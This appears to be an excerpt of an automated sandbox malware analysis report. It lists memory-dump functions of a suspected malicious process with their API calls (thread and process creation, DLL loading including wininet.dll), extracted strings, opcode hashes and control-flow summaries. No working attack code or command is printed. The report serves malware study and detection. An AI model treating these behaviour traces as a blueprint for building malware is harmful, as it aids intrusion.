                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 1836367815-3456940251
                                                            • Opcode ID: 1f76030872995a119fffb4dcd4e743c2c3515c92a5214d54dff2c5de1486bb0e
                                                            • Instruction ID: 4271cdd7778a996abb306de4a4815256c56e77b094e53b3fa093cfcee54fc0c4
                                                            • Opcode Fuzzy Hash: 1f76030872995a119fffb4dcd4e743c2c3515c92a5214d54dff2c5de1486bb0e
                                                            • Instruction Fuzzy Hash: 6311297390015D76EB119BE18C41EEFBF2CBF81794F048145FA4867181D6355D4687E1

                                                            Control-flow Graph

                                                            control_flow_graph 436 500cf0-500d5a call 51b4b0 call 51bec0 call 504460 call 4f1410 call 511b60 447 500d7a-500d80 436->447 448 500d5c-500d6b PostThreadMessageW 436->448 448->447 449 500d6d-500d77 448->449 449->447
                                                            APIs
                                                            • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 00500D67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 1836367815-3456940251
                                                            • Opcode ID: 56bde2b1104ceae008f594fe1d489f19974fe1a0a03902dd4b39c10a86ac2cbc
                                                            • Instruction ID: 78d51e98977b4ee434a30249b94d068c91bdbe96f50aa8ab27e7bc11e55bc169
                                                            • Opcode Fuzzy Hash: 56bde2b1104ceae008f594fe1d489f19974fe1a0a03902dd4b39c10a86ac2cbc
                                                            • Instruction Fuzzy Hash: 96019B72D4021D7AEB11ABE58C81EEF7F7CEF81794F048054FA0467181D6795D0647B1

                                                            Control-flow Graph

                                                            control_flow_graph 450 500cac-500cb8 450->450 451 500cba-500cbd 450->451 452 500d20-500d22 451->452 453 500cbf-500cc9 451->453 454 500d28-500d5a call 4f1410 call 511b60 452->454 455 500d23 call 504460 452->455 453->452 460 500d7a-500d80 454->460 461 500d5c-500d6b PostThreadMessageW 454->461 455->454 461->460 462 500d6d-500d77 461->462 462->460
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0349A-n$0349A-n
                                                            • API String ID: 0-3456940251
                                                            • Opcode ID: 03523de330cbb778cc34fa964ff4b6dde63fe6781dc13765c5006d6863283d36
                                                            • Instruction ID: 8388adcf38a8ee1051c9809166ed9ed3fbbe1ff5385b3258ac9d2ed683982939
                                                            • Opcode Fuzzy Hash: 03523de330cbb778cc34fa964ff4b6dde63fe6781dc13765c5006d6863283d36
                                                            • Instruction Fuzzy Hash: DD0147B6901149BEDF119BB54C81ABF6F6CFFD2798F048091F540E7181D5244D0287B6
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00513AEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: 708f5f20b7e7496beebeb298c6498da1c5483fec13b86b3fd29b4a45f348fd50
                                                            • Instruction ID: 58a5f30463a0f9d7deea80c9b86b92e54856aff290b83936b17d6882e4c57d70
                                                            • Opcode Fuzzy Hash: 708f5f20b7e7496beebeb298c6498da1c5483fec13b86b3fd29b4a45f348fd50
                                                            • Instruction Fuzzy Hash: 61318FB1600605BBE714DF64CC95FEBBBB8FB88704F10455DE619AB241D7706A80CBA4
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                            • Instruction ID: baf43261291daf24706062f8618530c8ec7f68c05625ed230a7c738b0bb5471d
                                                            • Opcode Fuzzy Hash: 6ff67cc44ea29b663d8a00fcdba15c28879c7a63330304db09f29e75e2b87ff3
                                                            • Instruction Fuzzy Hash: 26316175A0020AAFDB10DFD8DC809EFB7B9FF88304B108559E515A7254D775EE45CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                            • Instruction ID: bf94281b44da5019ca17c9dac22fe83ae5e8054e671e55575b3b49438e3250d1
                                                            • Opcode Fuzzy Hash: f3e160a9f1e899d13c39d3ff7a73cf50051c7985fc115966b4742201c8117501
                                                            • Instruction Fuzzy Hash: 0C3150B5A0020AAFDB10DFD8DC809EFB7B9BF88304B108559E905EB254D775EE458BA0
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0051969C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: 2P
                                                            • API String ID: 3298025750-1959614785
                                                            • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                            • Instruction ID: 2804a066b872445903c1e1be8ec5fa7d977c08295f50dcdba56cc23e2dbd5bb6
                                                            • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                            • Instruction Fuzzy Hash: D0E06D712042057BD610EE59DC45FAB37ACEFC8750F004419F909A7242D770BD118BB5
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56fdaf67af26a89d48321f54bdb37335752dedbf55b023a22c9891b34d3e6fed
                                                            • Instruction ID: ae0ac693c0a0bc09100c20afafb5e599a4a2b268e09847b6c0ac6f3f8c90be2c
                                                            • Opcode Fuzzy Hash: 56fdaf67af26a89d48321f54bdb37335752dedbf55b023a22c9891b34d3e6fed
                                                            • Instruction Fuzzy Hash: BF21A07A00DA962BE7219A344C01AF67F59FB63314B694A5CD9D2572D2CE12D80B82C1
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 005082AC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                            • Instruction ID: 1cf74ca9b9a2e87ebfbd9675000925b08b783e9f59df3c79b5edea9e4d6c4e77
                                                            • Opcode Fuzzy Hash: ae725d5d1022276922e887530209a410d5b39521f7ed0366200988ba5edd385e
                                                            • Instruction Fuzzy Hash: 4A017B7A606A4516E720A2789C4AFBDBF54BF45338F0847E8F9988B2D3E664D5028281
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005044D2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                            • Instruction ID: ca788905772ee05095ad3a07635baa43ce2c751b0717232a50ae9e241f6a87af
                                                            • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                            • Instruction Fuzzy Hash: 56011EB5D4020EABEF10DAE4DC46FDDBB78AB54308F044195AA0897281F635EB59CB91
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,0050823E,00000010,?,?,?,00000044,?,00000010,0050823E,?,?,?), ref: 00519753
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                            • Instruction ID: 6bf24f5dd470bcc2d5541cb07a053334637e4484535777f0d130bd61dddcaf11
                                                            • Opcode Fuzzy Hash: 016bd8ce1746197e8720e3a876af95e62b55fcc460ffb57a2bf48c7dd99eb0d8
                                                            • Instruction Fuzzy Hash: D701C0B2204108BFCB04DE99DC81EEB77ADAFCC714F418209BA09E3241D630F8518BA4
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004F9CE5
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                            • Instruction ID: bdbf11f31c5cff3bf9ebbaf876be411f9a8534b2c59e19126372cca2c12902d6
                                                            • Opcode Fuzzy Hash: 81bed8db2255a654e2e4f5805a192615afbdbb60f304de946e01026b61b93252
                                                            • Instruction Fuzzy Hash: 67F0653338061836F22065AA9C03FE7769CDBC0B65F14042AFB1CEB2C1D996B84146A8
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004F9CE5
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                            • Instruction ID: d83933d10aaedd20714c214d0675f4bbfa30c549519aa597ca7b566431d7f9b9
                                                            • Opcode Fuzzy Hash: 55c12ee0478bd197b30b76699c9a20714714125b54a48bb0ad2dbbf9c5c8d5a6
                                                            • Instruction Fuzzy Hash: 4BF065762C070577F220A695CC43FE7769CDF84B64F140019FB18AB2C1D6A5784187A8
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005044D2
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                            • Instruction ID: 004ed504acdd1798fb26e284762debf70650329cefd6735c738c33cdfa2f95b8
                                                            • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                            • Instruction Fuzzy Hash: 80F01CF6E4410AABDF10CBD4DC92FEDBB74AF54308F108195E6089A281E635EA55CF51
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00501969,?,00515DDF,00501969,005155FF,00515DDF,?,00501969,005155FF,00001000,?,?,00000000), ref: 0051964C
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                            • Instruction ID: b24c01eb3b92abe7fde122217a21148484c3a0c38fe31521485c7ef0e32df4ea
                                                            • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                            • Instruction Fuzzy Hash: 65E06DB12042097BDA10EE59DC41F9B37ADEFC4714F004009FA0CA7241D675BC108AB9
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 005082AC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                            • Instruction ID: 66904b0c0cbd6270361d80470e332fe1fad7ad378225709ae8cdd52fdc654cab
                                                            • Opcode Fuzzy Hash: 5a49965b76113d7eba8950a62bf73d699cb455ede4163327e3b47103c27001a1
                                                            • Instruction Fuzzy Hash: 84E0203920060817F72065A8DC45FF5335C6744724F0D0550BD5CCB2C1E574F8418154
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00501C70,00517F3E,005155FF,00501C36), ref: 005080A3
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                            • Instruction ID: 364d6b76719f2817f4d743e25a4900722451c8ba39723637cbc7c5d23b10d685
                                                            • Opcode Fuzzy Hash: 41c98a09423e25b3d80bc38189e147eb8eba39a4a8001bd81624460b1773707e
                                                            • Instruction Fuzzy Hash: 5DE0C2316402086FFA20EBF4EC27FE9325C6B80354F0444A4BA0CE72C2E975A4518669
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00501C70,00517F3E,005155FF,00501C36), ref: 005080A3
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                            • Instruction ID: 821cfd71456ec447b3e7711f6ab847df5c84cf206bf9875ed73bd8a560735fde
                                                            • Opcode Fuzzy Hash: 1881ecda90284090cb91987cf95af106e8e22d83d3344d8cc80dfc5dee4a4a96
                                                            • Instruction Fuzzy Hash: 57D05E712403087BF610A6E5DC2BFA6368C6B40754F0444A5BA4CE72C2E966F45081A9
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 60d2253336c8b1ac7b5e273e60cf18fa84ec33592520c94e83498eb7f576745e
                                                            • Instruction ID: 92fa6b90429d0454ae59e3c0afc9a60b75fd0dd675e942ff374d2421faf88218
                                                            • Opcode Fuzzy Hash: 60d2253336c8b1ac7b5e273e60cf18fa84ec33592520c94e83498eb7f576745e
                                                            • Instruction Fuzzy Hash: 62B09B719815C5C6EE51E7604A4D717794067D1705F55D075D3030685E4738C1D1F175
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141053142.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2c90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 025498aec11dcda84dc733139c27437218ec7e81399a40a62fefcf4651d99b5c
                                                            • Instruction ID: c39aa2075fbb8c0f153dd3f71b3f12a20abcc690488c169ba7ff9cec491db4a3
                                                            • Opcode Fuzzy Hash: 025498aec11dcda84dc733139c27437218ec7e81399a40a62fefcf4651d99b5c
                                                            • Instruction Fuzzy Hash: E441277161CB0D4FD768EF689085277B3F2FB88300F50052ED98AC3252EB74E8428B89
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141053142.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2c90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                            • API String ID: 0-3558027158
                                                            • Opcode ID: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                            • Instruction ID: 31b4e2ab106822b423daaf0bb677166ac50d8b2c79b8946da12a38d6a97a4b3f
                                                            • Opcode Fuzzy Hash: 73a9b7ed546a24be3e9317f37fdc970f6a216d0c2b4184c2805cffff4e0ed5c2
                                                            • Instruction Fuzzy Hash: C99142F04082948ACB158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: fefc80f80625b4db6764f39cb273aab24330e27a2b4d334905eaea2b253f3dcd
                                                            • Instruction ID: 93262f45c8519bff3f35f0ed234148194457d5c939b2e8cbbebde51dbba3a5fc
                                                            • Opcode Fuzzy Hash: fefc80f80625b4db6764f39cb273aab24330e27a2b4d334905eaea2b253f3dcd
                                                            • Instruction Fuzzy Hash: 1F5105B6A40116BFDB11DBA8C8D497EF7F8BB08204750D269F995D3680D334DE81CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 1e5a32992669129d3ae260dcce9d4422c44bc0f4da1cf63c64fa8c8179af435a
                                                            • Instruction ID: 5b8e37a4aff44ac8a64336cba2aac3981c70478fd9f7cc289d9654b995302169
                                                            • Opcode Fuzzy Hash: 1e5a32992669129d3ae260dcce9d4422c44bc0f4da1cf63c64fa8c8179af435a
                                                            • Instruction Fuzzy Hash: 32510475A80645AEDB30DE9CC8A09BFB7F9EF44204B00D469FA96C3641E774EE40CB60
                                                            Strings
                                                            • ExecuteOptions, xrefs: 02E346A0
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02E34655
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02E34725
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 02E34787
                                                            • Execute=1, xrefs: 02E34713
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02E34742
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02E346FC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 8c609c8606231fdb808440f5c62cfa76812b0ff012c1b0a156c24708f1aec849
                                                            • Instruction ID: 57581c0b984455e3b1c2f6e9ee8a00ef023c4800f995a9ff3a8da53703dba1a0
                                                            • Opcode Fuzzy Hash: 8c609c8606231fdb808440f5c62cfa76812b0ff012c1b0a156c24708f1aec849
                                                            • Instruction Fuzzy Hash: EE5128316402597AFF51ABA4EC99FEAB3B9EF08305F0500A9E605A72C0DB70DE45CF54
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: aadc5c257fbc5c76c8b95c0ae02b8c1e271d7937346da4001d5545d9fa219bec
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: 5E81A270E852498ADF288EA8C4D07EE7BA6BF4531CF18E65DD851A72D0C73098C2CB64
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: 17aaa595c216caeb664ce7c7fd16dd26ef6df4c5f16a64ba164608bf94f423bd
                                                            • Instruction ID: eb74838a8d3b6f3f1a74053c0de8766f1ac0f8a9fac05261f03487a8ec8bbbdd
                                                            • Opcode Fuzzy Hash: 17aaa595c216caeb664ce7c7fd16dd26ef6df4c5f16a64ba164608bf94f423bd
                                                            • Instruction Fuzzy Hash: 00218E76A40159ABDB10DE79D840AEEBBF9EF44748F449126EE45E3240EB309A018BA0
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E302E7
                                                            • RTL: Re-Waiting, xrefs: 02E3031E
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E302BD
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
